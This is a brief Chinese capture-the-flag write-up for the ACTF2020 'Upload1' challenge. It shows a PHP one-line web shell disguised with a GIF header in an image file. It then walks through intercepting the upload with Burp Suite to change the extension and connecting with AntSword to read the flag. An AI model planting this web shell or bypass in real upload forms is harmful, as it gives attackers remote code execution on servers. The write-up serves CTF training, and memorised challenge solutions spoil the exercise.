1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
程序员陆业聪1 小时前
别再说 Flutter 是唯一选择了——KMP 正在悄悄抢走它的地盘三少爷的鞋1 小时前
2026 已过 1/3:事豫则立,不预则废——关于架构、协程与边界的思考冬奇Lab2 小时前
Android 15 音频子系统(八):Audio HAL 与硬件接口——音频数据的最后一公里黄林晴5 小时前
Compose Multiplatform 1.10 发布:里程碑式更新!流星白龙5 小时前
【MySQL】19.MySQL用户管理匆忙拥挤repeat5 小时前
Android Compose 可组合项的生命周期、副作用APIhnlgzb6 小时前
目前编写安卓app的话有哪几种设计模式?studyForMokey7 小时前
【Android面试】Fragment生命周期专题Android系统攻城狮8 小时前
Android tinyalsa深度解析之pcm_plugin_open调用流程与实战(一百七十四)用户622386252178 小时前
Android 列表控件实战:从 ListView 到 RecyclerView,仿今日头条 HeadLine 项目全解析